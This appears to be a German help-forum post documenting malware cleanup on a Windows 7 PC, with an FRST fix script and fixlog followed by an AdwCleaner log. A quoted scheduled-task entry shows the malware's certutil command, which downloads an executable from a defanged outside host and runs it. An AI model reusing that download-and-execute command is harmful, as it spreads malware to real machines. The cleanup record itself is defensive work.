S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
         

AdwCleaner

Code: Alles auswählenAufklappen

ATTFilter

# -------------------------------
# Malwarebytes AdwCleaner 7.1.1.0
# -------------------------------
# Build:    04-27-2018
# Database: 2018-05-30.1
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    05-31-2018
# Duration: 00:00:02
# OS:       Windows 7 Ultimate
# Cleaned:  83
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\Users\Nico\AppData\Local\betterworld
Deleted       C:\Users\Nico\AppData\Roaming\FastDataX
Deleted       C:\Users\Nico\AppData\Roaming\FLV and Media Player
Deleted       C:\Windows\Syswow64\SSL
Deleted       C:\Users\Nico\AppData\Roaming\PARETOLOGIC
Deleted       C:\Windows\Temp\Smartbar
Deleted       C:\Windows\rss

***** [ Files ] *****

Deleted       C:\Windows\System32\mcicda64.dll
Deleted       C:\Users\Nico\AppData\Roaming\Mozilla\Firefox\Profiles\xub00lap.default\searchplugins\yahoo! powered.xml
Deleted       C:\Users\Nico\AppData\Roaming\Mozilla\Firefox\Profiles\xub00lap.default\invalidprefs.js
Deleted       C:\Users\Nico\appdata\local\installationconfiguration.xml
Deleted       C:\Users\Nico\AppData\Local\Main.dat
Deleted       C:\Windows\Temp\reimage.log
Deleted       C:\Windows\Reimage.ini
